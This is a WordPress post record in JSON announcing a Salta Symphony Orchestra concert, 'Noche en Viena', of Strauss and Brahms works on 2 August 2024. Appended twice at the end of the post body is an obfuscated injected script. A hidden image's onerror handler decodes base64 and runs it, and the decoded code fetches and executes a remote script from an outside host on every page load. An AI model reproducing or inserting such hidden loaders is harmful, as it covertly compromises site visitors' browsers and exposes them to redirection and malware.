{"id":4246,"date":"2024-07-31T10:23:19","date_gmt":"2024-07-31T13:23:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4246"},"modified":"2025-08-13T23:51:48","modified_gmt":"2025-08-14T02:51:48","slug":"la-orquesta-sinfonica-de-salta-presenta-una-velada-musical-de-valses-y-polkas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4246","title":{"rendered":"La Orquesta Sinf\u00f3nica de Salta presenta una velada musical de valses y polkas"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e48b4d7f85ed401412a04f2db1cbdd88\" style=\"background-color:#78072d\"><em>El pr\u00f3ximo 2 de agosto, la Orquesta Sinf\u00f3nica de Salta ofrecer\u00e1 un concierto especial bajo la direcci\u00f3n de Edgar Ferrer, interpretando obras de Johann Strauss y Johannes Brahms en el Teatro Provincial Juan Carlos Saravia.<\/em><\/h4>\n\n\n\n<p>La Orquesta Sinf\u00f3nica de Salta anunci\u00f3&nbsp;un concierto muy especial para su Temporada 2024, titulado \u00abNoche en Viena. Valses, Polkas y Danzas\u00bb. Este evento tendr\u00e1 lugar el viernes 2 de agosto, a las 21, en el&nbsp;Teatro Provincial Juan Carlos Saravia. Bajo la batuta del director invitado Edgar Ferrer, la orquesta interpretar\u00e1 obras maestras de Johann Strauss y Johannes Brahms, dos de los compositores m\u00e1s emblem\u00e1ticos de la tradici\u00f3n vienesa.<\/p>\n\n\n\n<p>La elecci\u00f3n del repertorio re\u00fane compositores como Johann Strauss, conocido como el \u00abRey del Vals\u00bb; Johannes Brahms, cuyas danzas h\u00fangaras capturan la esencia de la m\u00fasica folkl\u00f3rica centroeuropea; y Vittorio Monti. Las entradas para este evento ya est\u00e1n a la venta en www.saltaticket.gob.ar y en la boleter\u00eda del Teatro Provincial.<\/p>\n\n\n\n<p>Asimismo, la Secretar\u00eda de Cultura y el Instituto de M\u00fasica y Danza recuerdan que las entradas para estudiantes y adultos mayores son sin cargo, disponibles exclusivamente en la boleter\u00eda del teatro.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pr\u00f3ximo 2 de agosto, la Orquesta Sinf\u00f3nica de Salta ofrecer\u00e1 un concierto especial bajo la direcci\u00f3n de Edgar Ferrer, interpretando obras de Johann Strauss y Johannes Brahms en el Teatro Provincial Juan Carlos Saravia. La Orquesta Sinf\u00f3nica de Salta anunci\u00f3&nbsp;un concierto muy especial para su Temporada 2024, titulado \u00abNoche en Viena. Valses, Polkas y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4247,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-4246","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4246"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4246"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4246\/revisions"}],"predecessor-version":[{"id":6727,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4246\/revisions\/6727"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4247"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}